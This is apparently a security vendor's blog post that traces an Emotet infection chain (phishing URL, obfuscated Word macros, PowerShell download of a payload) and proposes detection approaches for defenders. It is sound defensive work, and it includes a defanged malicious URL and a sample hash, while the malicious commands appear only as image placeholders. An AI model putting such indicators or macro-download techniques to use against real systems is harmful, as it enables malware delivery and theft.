ThreatEx Labs

PatternEx ThreatEx Labs features timely and actionable insights from world-class security researchers with AI expertise.
Readers will enhance their skill sets with tools and knowledge to efficiently leverage AI for information security.

Exploring Detection Signals from Weaponized Office Documents

Microsoft Office documents have re-established themselves in recent years as viable springboards for pillaging the digital assets of enterprises globally. These documents are particularly common in the Delivery phase (KC3) and occasionally the Actions on Objectives phase (KC7) in Lockheed's Kill Chain framework. In this post, we'll examine a recent information-stealing trojan known as Emotet, and also explore the data sources and tools enterprise defenders can leverage to detect or hunt infections that avoid basic signature or rule based matching defense.  

Background

Office documents have plenty of bells and whistles such as Visual Basic for Applications (VBA) macros, Dynamic Data Exchange (DDE), Object Linking and Embedding (OLE) that are ripe for abuse by threat actors. These documents are commonly utilized as "downloaders," and are particularly effective in the initial stages of an attack. Generally speaking, they serve two purposes:

  1. On the surface, the user is given the impression that the document is legitimate and baits the user into enabling macros to run (if necessary).
  2. Behind the scenes, abuse Office features like VBA macros to download and execute a payload with comprehensive malicious capabilities. These scripts or commands leverage interpreters like PowerShell that are natively built into Microsoft Windows.

Emotet Banking Trojan

US-CERT released an advisory thoroughly describing the Emotet banking trojan. The diagram below illustrates what this attack looks like:

emotet_diagram

Source: https://www.us-cert.gov/ncas/alerts/TA18-201A


The US-CERT advisory emphasizes that "Emotet is a polymorphic banking Trojan that can evade typical signature-based detection". This poses a non-trivial problem for enterprise defenders; if only a handful of security vendors possess capabilities for detecting these threats when they're first discovered in the wild, how do we go about detecting tomorrow's threats? How do we buck the trend of reacting to these threats after the fact, and instead develop proactive, robust and reliable detection capabilities without a crystal ball or pure luck?

To answer these questions, let's step through each phase of the infection chain and explore some possible detection strategies.

Step 1: Delivery via social engineering

The initial inbound phishing email contains a malicious URL. One of the Emotet URLs was hxxp://baute[.]org/files/En_us/Client/Invoice-2667266/.

The US-CERT advisory stated that most campaigns imitate PayPal receipts, shipping notifications, or "past-due" invoices. Spam filtering is a great use case for machine learning because there's a mountain of historical data for training, easy generalization of characteristics (for example, using bag-of-words in e-mail bodies), and real-time feedback from users (incremental learning). Regular expressions and strings for pattern matching can be equally effective as well with some tuning. A popular security researcher, SwiftOnSecurity, was generous enough to open-source several useful Exchange Transport rules that might be worth exploring.

Another interesting approach would be to deploy Bro IDS (recently renamed "Zeek") and passively monitor SMTP traffic. Included is a Bro script that logs URLs discovered in e-mail traffic, and also looks for them to be visited via HTTP requests. Correlating those against blacklists, newly observed domains, and/or several other heuristics would be a great place to look for malicious URLs.

Step 2: Word document download with heavily obfuscated macros

While signatures thrive at identifying very specific patterns, they tend to be ineffective when it comes to holistically generalizing characteristics that make up a particular group or activity (i.e. obfuscated VBA macros). Additionally, they focus almost exclusively on the presence of malicious characteristics while ignoring the absence of benign characteristics. This is a gap that machine learning can fill quite nicely. Below is a snippet of the obfuscated macros present in one of the Emotet downloaders (MD5: aaaa79611eb2b3fb2219bde6d979a0b4, sandbox analysis from any[.]run available here).

obfuscated_macros_snippet

 

Deobfuscating the macros (as I did using a tool named ViperMonkey) reveals the following PowerShell command. Ironically, notice that the command passed to the PowerShell interpreter is also obfuscated:

vipermonkey

Can you write a signature to detect this?

My suggestion would be to deploy Strelka, a distributed file scanning platform recently open-sourced by Josh Liburdi and the security team at Target. One of the 40+ modules, scan_vba.py, extracts and analyzes VBA macros from document files. Other modules included in the project that might be useful include scanning with Yara rules, calculating file entropy, extracting strings from files, and performing dynamic analysis using Cuckoo sandbox. Perhaps a custom analyzer that uses machine learning to detect obfuscated VBA macros (and automatically sandbox or deobfuscate them) could prove to be an effective detection strategy.


Step 3: PowerShell payload download and execution

Three options for collecting endpoint telemetry of invoked PowerShell commands:

  1. are command line process auditing in Windows security logs,
  2. process execution events in Sysmon logs, or
  3. script block and module logging in PowerShell logs (requires PowerShell v5).

While installation/configuration of these utilities is free, costs could certainly be incurred from MPLS for centralized logging or storing the data in SIEMs that charge by log volume. PatternEx customers, however, enjoy unlimited log volume ingestion.

Script block logging records the raw commands passed into the PowerShell interpreter. Obfuscated commands like the one shown below have some very unique characteristics (i.e. high frequencies of special characters, high entropy, and values from PowerShell's Tokenizer) that can easily be distinguished from benign PowerShell commands. Daniel Bohannon and Lee Holmes developed and released Revoke-Obfuscation last year, a PowerShell obfuscation detection framework driven by supervised machine learning. I'd strongly encourage you to check that out.

script_block_powershell

Module logging, however, unravels most of these obfuscation techniques and shows decoded commands actually invoked by the PowerShell engine. Rules, signatures, or regular expressions may prove useful here. The screenshot below depicts the decoded PowerShell command responsible for downloading and running the malicious executable. It's apparent that the command cycles through five URLs attempting to download and execute the content (an information stealing binary):

module_powershell

 

Conclusion

Whether it's fileless malware, cryptominers, insider threats, or commodity malware, the threat landscape has never been as diverse as it is today. The concept of defense-in-depth is crucial for security teams to keep pace with evolving attacker tradecraft.

Thanks for reading!

 

PatternEx Threat Prediction Platform Architecture

Learn how PatternEx dynamically accepts security analysts feedback to create predictive models that continuously adapt to detect new and existing threats. Using this feedback PatternEx is continuously trained to improve detection accuracy. Download the white paper to learn more.

Download Now